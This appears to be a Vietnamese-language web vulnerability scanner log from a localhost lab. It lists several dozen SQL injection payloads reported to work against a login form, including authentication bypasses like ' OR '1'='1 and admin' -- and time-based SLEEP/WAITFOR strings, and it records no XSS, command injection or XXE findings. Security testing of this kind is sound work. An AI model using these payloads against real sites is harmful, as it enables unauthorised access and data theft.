[TIME] 2025-08-23 02:59:07
[URL] http://localhost/sqli/
[SUMMARY] SQLi
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://localhost/sqli/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công SQLi với các payloads:
    - txt_uname=Error-based: ' OR '1'='1
    - but_submit=Error-based: ' OR '1'='1
    - txt_uname=Error-based: " OR "1"="1
    - txt_pwd=Error-based: " OR "1"="1
    - but_submit=Error-based: " OR "1"="1
    - but_submit=Error-based: ') OR ('1'='1
    - txt_uname=Error-based: " OR 1=1 --
    - txt_pwd=Error-based: " OR 1=1 --
    - but_submit=Error-based: " OR 1=1 --
    - but_submit=Error-based: ' OR 1=1#
    - txt_uname=Error-based: " OR 1=1#
    - txt_pwd=Error-based: " OR 1=1#
    - but_submit=Error-based: " OR 1=1#
    - but_submit=Error-based: admin' --
    - txt_uname=Error-based: 1' or '1' = '1
    - but_submit=Error-based: 1' or '1' = '1
    - but_submit=Error-based: ' AND 1=1 --
    - but_submit=Error-based: ' AND 1=2 --
    - txt_uname=Error-based: " AND 1=1 --
    - txt_pwd=Error-based: " AND 1=1 --
    - but_submit=Error-based: " AND 1=1 --
    - txt_uname=Error-based: " AND 1=2 --
    - txt_pwd=Error-based: " AND 1=2 --
    - but_submit=Error-based: " AND 1=2 --
    - but_submit=Error-based: ') AND '1'='1
    - but_submit=Error-based: ') AND '1'='2
    - txt_uname=Error-based: " OR "" = "
    - txt_pwd=Error-based: " OR "" = "
    - but_submit=Error-based: " OR "" = "
    - txt_uname=Error-based: ' OR '' = '
    - but_submit=Error-based: ' OR '' = '
    - but_submit=Error-based: '; WAITFOR DELAY '0:0:5' --
    - but_submit=Error-based: '; SELECT pg_sleep(5)--
    - txt_uname=Error-based: " OR SLEEP(5) --
    - txt_pwd=Error-based: " OR SLEEP(5) --
    - but_submit=Error-based: " OR SLEEP(5) --
    - but_submit=Error-based: ') OR SLEEP(5) --
    - txt_uname=Error-based: " OR 1=1; SLEEP(5) --
    - txt_pwd=Error-based: " OR 1=1; SLEEP(5) --
    - but_submit=Error-based: " OR 1=1; SLEEP(5) --
    - but_submit=Error-based: admin' OR SLEEP(3)--
    - txt_uname=Error-based: 1); SELECT sleep(5);--
    - txt_pwd=Error-based: 1); SELECT sleep(5);--
    - but_submit=Error-based: 1); SELECT sleep(5);--


======= XSS =======
[*] Đang kiểm tra XSS trên: http://localhost/sqli/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng XSS.



======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://localhost/sqli/
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: http://localhost/sqli/
[✓] Không phát hiện lỗ hổng XXE.


